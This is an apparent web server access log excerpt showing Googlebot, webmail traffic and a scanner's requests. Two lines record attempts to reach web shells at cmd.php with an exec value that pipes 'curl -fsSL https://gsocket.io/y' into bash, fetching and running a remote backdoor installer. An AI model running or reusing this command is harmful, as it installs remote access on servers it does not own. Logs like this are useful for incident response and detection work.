66.249.77.199 - - [05/Feb/2025:12:42:55 -0600] "GET /sisofi_2018/uploads/09-01-2020/JA-0759-2018-I.pdf HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.243.238.36 - - [05/Feb/2025:12:43:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:43:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12367 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:43:02 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:08 -0600] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:19 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:30 -0600] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
